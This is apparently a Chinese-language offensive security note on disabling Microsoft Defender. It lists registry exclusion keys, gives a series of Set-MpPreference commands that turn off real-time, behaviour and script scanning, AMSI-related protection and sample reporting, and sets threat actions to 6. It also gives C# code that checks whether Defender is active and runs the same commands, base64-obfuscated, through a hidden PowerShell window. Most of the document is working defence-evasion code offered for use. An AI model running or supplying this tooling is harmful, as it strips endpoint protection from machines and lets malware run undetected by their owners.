通过修改Defender扫描行为、扫描强度等设置来尽量降低Defender防护强度
Defender白名单注册表键值
在新一些的版本中有Tamper Protection所以就不行了
直接向白名单路径下添加值即可
- 目录及文件:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
- 后缀:
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions
- 进程:
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
降低Defender防护能力
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| powershell Set-MpPreference -DisableRealtimeMonitoring $true //禁用实时监控,执行了会在右下角有提示,不使用
powershell Set-MpPreference -DisableArchiveScanning $true //禁用存档扫描
powershell Set-MpPreference -DisableBehaviorMonitoring $true //禁用行为监控
powershell Set-MpPreference -DisableBlockAtFirstSeen $true
powershell Set-MpPreference -DisableIOAVProtection $true //禁用IOAV保护,禁用AMSI
powershell Set-MpPreference -DisablePrivacyMode $true //禁用隐私模式
powershell Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true //没有引擎启动时签名禁用更新
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
powershell Set-MpPreference -DisableScriptScanning $true //禁用脚本扫描
powershell Set-MpPreference -SubmitSamplesConsent 2
powershell Set-MpPreference -MAPSReporting 0
powershell Set-MpPreference -HighThreatDefaultAction 6 -Force
powershell Set-MpPreference -ModerateThreatDefaultAction 6
powershell Set-MpPreference -LowThreatDefaultAction 6
powershell Set-MpPreference -SevereThreatDefaultAction 6 //严重威胁默认操作
|
检测是否是Defender
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| using Microsoft.Win32;
public static bool isDefender()
{
string regPath = @"SOFTWARE\Microsoft\Windows Defender";
try
{
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.Default))
{
if (key.GetValue("DisableAntiSpyware").ToString() == "1" | key.GetValue("DisableAntiVirus").ToString() == "1")
{
return false;
}
else
{
return true;
}
}
}
catch (Exception)
{
return true;
}
}
|
关闭Defender防护
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| public static void KillWindowsDefender()
{
string pj = @"UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwAgACQAdAByAHUAZQAsAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIAAkAHQAcgB1AGUALABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBEAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIAAkAHQAcgB1AGUALABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBEAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgACQAdAByAHUAZQAsAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUAByAGkAdgBhAGMAeQBNAG8AZABlACAAJAB0AHIAdQBlACwAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwBpAGcAbgBhAHQAdQByAGUARABpAHMAYQBiAGwAZQBVAHAAZABhAHQAZQBPAG4AUwB0AGEAcgB0AHUAcABXAGkAdABoAG8AdQB0AEUAbgBnAGkAbgBlACAAJAB0AHIAdQBlACwAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBJAG4AdAByAHUAcwBpAG8AbgBQAHIAZQB2AGUAbgB0AGkAbwBuAFMAeQBzAHQAZQBtACAAJAB0AHIAdQBlACwAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBTAGMAcgBpAHAAdABTAGMAYQBuAG4AaQBuAGcAIAAkAHQAcgB1AGUALABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBTAHUAYgBtAGkAdABTAGEAbQBwAGwAZQBzAEMAbwBuAHMAZQBuAHQAIAAyACwAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ATQBBAFAAUwBSAGUAcABvAHIAdABpAG4AZwAgADAALABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBIAGkAZwBoAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIAA2ACAALQBGAG8AcgBjAGUALABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBNAG8AZABlAHIAYQB0AGUAVABoAHIAZQBhAHQARABlAGYAYQB1AGwAdABBAGMAdABpAG8AbgAgADYALABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBMAG8AdwBUAGgAcgBlAGEAdABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuACAANgAsAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAFMAZQB2AGUAcgBlAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIAA2AA==";
pj = Encoding.Unicode.GetString(Convert.FromBase64String(pj));
Process p = new Process();
p.StartInfo.FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe";
p.StartInfo.UseShellExecute = false;
p.StartInfo.CreateNoWindow = true;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.RedirectStandardInput = true;
p.Start();
foreach (var i in pj.Split(','))
{
Console.WriteLine(i);
p.StandardInput.WriteLine(i);
}
p.StandardInput.WriteLine("exit");
p.Dispose();
}
|
